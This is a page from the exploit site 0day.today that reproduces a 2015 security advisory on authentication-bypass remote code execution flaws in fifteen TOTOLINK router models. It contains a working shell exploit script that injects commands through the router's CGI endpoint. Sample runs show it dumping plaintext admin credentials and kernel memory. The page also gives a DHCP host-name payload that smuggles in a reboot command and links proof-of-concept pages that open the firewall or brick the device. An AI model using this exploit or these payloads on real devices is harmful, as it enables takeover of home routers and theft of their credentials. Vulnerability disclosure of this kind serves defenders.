0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
15 TOTOLINK Router Models - Multiple RCE Vulnerabilities
[## Advisory Information Title: 15 TOTOLINK router models vulnerable to multiple RCEs Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html Date published: 2015-07-16 Vendors contacted: None Release mode: 0days, Released CVE: no current CVE ## Product Description TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO markets in South Korea. TOTOLINK produces routers routers, wifi access points and network devices. Their products are sold worldwide. ## Vulnerabilities Summary The first vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single HTTP request. The second vulnerability allows to bypass the admin authentication and to get a direct RCE from the LAN side with a single DHCP request. There are direct RCEs against the routers which give a complete root access to the embedded Linux from the LAN side. The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin) - TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin) - TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin - totolink.net) - TOTOLINK EX300 : until last firmware (9.36 - ex300_ch_9_36.bin.5357c0 - totolink.cn) - TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0) - TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin) - TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin) - TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin) - TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin) - TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK N302R Plus V1_en_8_82.bin) - TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK N302R Plus V2_en_9_08.bin) - TOTOLINK A3004NS (no firmware available in totolinkusa.com but ipTIME's A3004NS model was vulnerable to the 2 RCEs) - TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0) The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares to the latest firmwares with the default configuration: - TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin) - TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin) Firmwares come from totolink.net and from totolink.cn. - - From my tests, it is possible to use these vulnerabilities to overwrite the firmware with a custom (backdoored) firmware. Concerning the high CVSS score (10/10) of the vulnerabilities and the longevity of this vulnerability (6+ year old), the TOTOLINK users are urged to contact TOTOLINK. ## Details - RCE with a single HTTP request The HTTP server allows the attacker to execute some CGI files. Many of them are vulnerable to a command inclusion which allows to execute commands with the http daemon user rights (root). Exploit code: $ cat totolink.carnage #!/bin/sh if [ ! $1 ]; then echo "Usage:" echo $0 ip command exit 1 fi wget -qO- --post-data="echo 'Content-type: text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh The exploits have been written in HTML/JavaScript, in form of CSRF attacks, allowing people to test their systems in live using their browsers: http://pierrekim.github.io/advisories/ o Listing of the filesystem HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html Using CLI: root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head ash auth busybox cat chmod cp d.cgi date echo false root@kali:~/totolink# o How to retrieve the credentials ? (see login and password at the end of the text file) HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg wantype.wan1=dynamic dhblock.eth1=0 ppp_mtu=1454 fakedns=0 upnp=1 ppp_mtu=1454 timeserver=time.windows.com,gmt22,1,480,0 wan_ifname=eth1 auto_dns=1 dhcp_auto_detect=0 wireless_ifmode+wlan0=wlan0,0 dhcpd=0 lan_ip=192.168.1.1 lan_netmask=255.255.255.0 dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0 dhcpd_dns=164.124.101.2,168.126.63.2 dhcpd_opt=7200,30,200, dhcpd_configfile=/etc/udhcpd.conf dhcpd_lease_file=/etc/udhcpd.leases dhcpd_static_lease_file=/etc/udhcpd.static use_local_gateway=1 login=admin password=admin Login and password are stored in plaintext, which is a very bad security practice. o Current running process: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html Using CLI: kali# ./totolink.carnage 192.168.1.1 ps -auxww o Getting the kernel memory: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html Using CLI: kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore o Default firewall rules: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html Using CLI: kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL o Opening the management interface on the WAN: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html o Reboot the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html o Brick the device: HTML/JS exploits: http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. By the way, d.cgi in /bin/ is an intentional backdoor. ## Details - RCE with a single DHCP request This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD server in TOTOLINK devices allows remote attackers to execute arbitrary commands via shell metacharacters in the host-name field. Sending a DHCP request with this parameter will reboot the device: cat /etc/dhcp/dhclient.conf send host-name ";/sbin/reboot"; When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we will see the stdout of the /dev/console device; the dhcp request will immediately force the reboot of the remote device: Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [...] WiFi Simple Config v1.12 (2009.07.31-11:35+0000). Launch iwcontrol: wlan0 Reaped 317 iwcontrol RUN OK SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed WAN0 IP: 192.168.2.1 signalling START Invalid upnpd exit killall: upnpd: no process killed upnpd Restart 1 iptables: Bad rule (does a matching rule exist in that chain?) Session Garbage Collecting:Maybe system time is updated.( 946684825 0 ) Update Session timestamp and try it after 5 seconds again. ez_ipupdate callback --> time_elapsed: 0 Run DDNS by IP change: / 192.168.2.1 Reaped 352 iptables: Bad rule (does a matching rule exist in that chain?) Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048 Reaped 363 Led Silent Callback Turn ON All LED Dynamic Channel Search for wlan0 is OFF start_signal => plantynet_sync Do start_signal => plantynet_sync SIGNAL -> Config Update signal progress killall: pppoe-relay: no process killed SIGNAL -> WAN ip changed Reaped 354 iptables: Bad rule (does a matching rule exist in that chain?) ez_ipupdate callback --> time_elapsed: 1 Run DDNS by IP change: / 192.168.2.1 Burst DDNS Registration is denied: iptime -> now:26 Led Silent Callback Turn ON All LED /proc/sys/net/ipv4/tcp_syn_retries: cannot create - - - ---> Plantynet Event : 00000003 - - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE [sending the DHCP request] [01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1 00:01:03 miniupnpd[370]: received signal 15, good-bye Reaped 392 Reaped 318 Reaped 314 Reaped 290 Reaped 288 Reaped 268 Reaped 370 Reaped 367 - - - ---> PLANTYNET_SYNC_FREE_DEVICE Restarting system. Booting... @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize @ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h @ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName @ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16 @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Reboot Result from Watchdog Timeout! - - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz) Delay 1 second till reset button Magic Number: raw_nv 00000000 Check Firmware(05020000) : size: 0x001ddfc8 ----> [...] An attacker can use the /usr/bin/wget binary located in the file system of the remote device to plant a backdoor and then execute it as root. ## Vendor Response Due to "un-ethical code" found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case, but ipTIME was contacted in April 2015 concerning the first RCE. ## Report Timeline * Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in ipTIME products. * Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products. * Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products. * Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and EX750 routers. * Jul 13, 2015: Updated firmwares confirmed vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x00.txt https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html # 0day.today [2024-11-15] #